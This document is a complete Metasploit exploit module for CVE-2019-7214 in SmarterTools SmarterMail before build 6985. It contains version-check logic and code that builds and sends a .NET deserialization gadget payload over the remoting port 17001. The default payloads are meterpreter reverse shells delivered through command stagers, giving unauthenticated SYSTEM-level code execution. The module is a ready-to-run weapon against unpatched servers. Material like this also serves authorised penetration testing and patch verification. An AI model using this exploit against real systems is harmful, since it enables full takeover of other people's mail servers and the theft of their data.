SmarterTools SmarterMail Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution',  
'Description' => %q{  
This module exploits a vulnerability in the SmarterTools SmarterMail  
software for version numbers <= 16.x or for build numbers < 6985.  
The vulnerable versions and builds expose three .NET remoting endpoints  
on port 17001, namely /Servers, /Mail and /Spool. For example, a  
typical installation of SmarterMail Build 6970 will have the /Servers  
endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where  
serialized .NET commands can be sent through a TCP socket connection.  
  
The three endpoints perform deserialization of untrusted data  
(CVE-2019-7214), allowing an attacker to send arbitrary commands  
to be deserialized and executed. This module exploits this vulnerability  
to perform .NET deserialization attacks, allowing remote code execution  
for any unauthenticated user under the context of the SYSTEM account.  
Successful exploitation results in full administrative control of the  
target server under the NT AUTHORITY\SYSTEM account.  
  
This vulnerability was patched in Build 6985, where the 17001 port is  
no longer publicly accessible, although it can be accessible locally  
at 127.0.0.1:17001. Hence, this would still allow for a privilege  
escalation vector if the server is compromised as a low-privileged user.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Soroush Dalili', # Original discovery and PoC  
'1F98D', # ExploitDB author  
'Ismail E. Dawoodjee' # Metasploit module author  
],  
'References' => [  
[ 'CVE', '2019-7214' ],  
[ 'EDB', '49216' ],  
[ 'URL', 'https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/' ]  
],  
'Platform' => 'win',  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Targets' => [  
[  
'Windows Command',  
{  
'Platform' => 'win',  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Type' => :win_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'x86/x64 Windows CmdStager',  
{  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :windows_cmdstager,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',  
'CmdStagerFlavor' => 'vbs'  
},  
'CmdStagerFlavor' => %w[vbs certutil]  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => '2019-04-17',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]  
}  
)  
)  
register_options(  
[  
Opt::RPORT(9998, true, 'SmarterMail default HTTP port'),  
OptString.new('TARGETURI', [true, 'Base path', '/']),  
OptInt.new('TCP_PORT', [true, 'SmarterMail default .NET remoting port', 17001]),  
OptString.new(  
'ENDPOINT', [  
true,  
'Choose one of three exposed endpoints: Servers, Spool, and Mail. Example - tcp://127.0.0.1:17001/Servers',  
'Servers'  
]  
)  
]  
)  
end  
  
def check  
print_status('Checking target web server for a response...')  
res = send_request_cgi!({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path)  
})  
  
if res  
body = res.body  
else  
return CheckCode::Unknown('Target did not respond to check request.')  
end  
  
unless res.code == 200 && body.downcase.include?('smartermail')  
return CheckCode::Unknown('Target is not running SmarterMail.')  
end  
  
print_good('Target is running SmarterMail.')  
  
print_status('Checking SmarterMail product build...')  
product_build = body.match('stProductBuild.*\s\(')  
build_number = product_build.to_s.scan(/\d+/)[0] if product_build  
  
if product_build  
print_good("Target is running SmarterMail Build #{build_number}.")  
else  
print_warning('Product build not found. 16.x versions and below do not have a build number.')  
end  
  
if product_build && Rex::Version.new(build_number) < Rex::Version.new('6985')  
return CheckCode::Appears  
end  
  
print_status('Checking SmarterMail product version...')  
product_version = body.match('stProductVersion.*')  
version_number = product_version.to_s.split('"')[1] if product_version  
  
unless product_version  
return CheckCode::Detected('SmarterMail product version cannot be determined.')  
end  
  
print_good("Target is running SmarterMail Version #{version_number}.")  
  
if Rex::Version.new(version_number) <= Rex::Version.new('16.3.6989.16341')  
return CheckCode::Appears  
end  
  
return CheckCode::Safe  
end  
  
def execute_command(cmd, _opts = {})  
uri = "tcp://#{datastore['RHOST']}:#{datastore['TCP_PORT']}/#{datastore['ENDPOINT']}"  
  
serialized = ::Msf::Util::DotNetDeserialization.generate(  
cmd,  
gadget_chain: :TypeConfuseDelegate,  
formatter: :BinaryFormatter  
)  
  
preamble = '.NET'.unpack('C*') # Header  
preamble += [0x01] # Version Major  
preamble += [0x00] # Version Minor  
preamble += [0x00, 0x00] # Operation Type  
preamble += [0x00, 0x00] # Content Distribution  
preamble += [serialized.length].pack('I').unpack('C*') # Serialized Data Length  
preamble += [0x04, 0x00] # URI Header  
preamble += [0x01] # Data Type  
preamble += [0x01] # Encoding - UTF8  
preamble += [uri.length].pack('I').unpack('C*') # URI Length  
preamble += uri.unpack('C*') # URI  
preamble += [0x00, 0x00] # Terminating Header  
data = preamble + serialized.unpack('C*') # Data to Send  
final_payload = data.pack('C*')  
  
begin  
sock = Rex::Socket::Tcp.create(  
'PeerHost' => datastore['RHOST'],  
'PeerPort' => datastore['TCP_PORT'],  
'Proxies' => datastore['Proxies'],  
'Context' => {  
'Msf' => framework,  
'MsfExploit' => self  
}  
)  
sock.write(final_payload)  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
print_error("Failed: #{e.class} - #{e.message}")  
elog(e)  
ensure  
sock.close if sock  
end  
end  
  
def exploit  
case target['Type']  
when :win_cmd  
execute_command(payload.encoded)  
when :windows_cmdstager  
execute_cmdstager  
end  
end  
  
end  
`